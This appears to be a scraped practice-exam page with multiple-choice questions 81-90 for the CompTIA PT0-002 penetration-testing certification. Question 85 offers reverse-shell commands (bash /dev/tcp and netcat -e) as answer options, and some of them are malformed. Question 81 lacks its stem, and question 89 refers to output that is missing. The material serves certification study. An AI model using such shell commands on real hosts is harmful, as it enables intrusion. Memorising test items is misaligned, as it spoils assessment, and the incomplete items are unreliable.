Summer Special 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: bestdeal

Free CompTIA PT0-002 Practice Exam with Questions & Answers | Set: 9

Questions 81
Options:
A.

Burp Suite

B.

Wireshark

C.

Metasploit

D.

Nmap

CompTIA PT0-002 Premium Access
Questions 82

Which of the following is most important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Options:
A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe typecasting operations

Questions 83

Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?

Options:
A.

CeWL

B.

John the Ripper

C.

Hashcat

D.

Hydra

Questions 84

A penetration tester runs the following command:

nmap -p- -A 10.0.1.10

Given the execution of this command, which of the following quantities of ports will Nmap scan?

Options:
A.

1,000

B.

1,024

C.

10,000

D.

65,535

Questions 85

After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

Options:
A.

bash -i >& /dev/tcp 8443 0>&l

B.

nc -e host 8443 /bin/bash

C.

nc -vlp 8443 /bin/bash

D.

nc -vp 8443 /bin/bash

Questions 86

A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

Options:
A.

inurl:

B.

link:

C.

site:

D.

intitle:

Questions 87

For an engagement, a penetration tester is required to use only local operating system tools for file transfer. Which of the following options should the penetration tester consider?

Options:
A.

Netcat

B.

WinSCP

C.

Filezilla

D.

Netstat

Questions 88

A penetration tester is performing an assessment for an organization and must gather valid user credentials. Which of the following attacks would be best for the tester to use to achieve this objective?

Options:
A.

Wardriving

B.

Captive portal

C.

Deauthentication

D.

Impersonation

Questions 89

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:

PT0-002 Question 89

Which of the following is the most likely explanation for the output?

Options:
A.

The tester does not have credentials to access the server-status page.

B.

The admin directory cannot be fuzzed because it is forbidden.

C.

The admin, test, and db directories redirect to the log-in page.

D.

The robots.txt file has six entries in it.

Questions 90

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

Options:
A.

A vulnerability scan

B.

A WHOIS lookup

C.

A packet capture

D.

An Nmap scan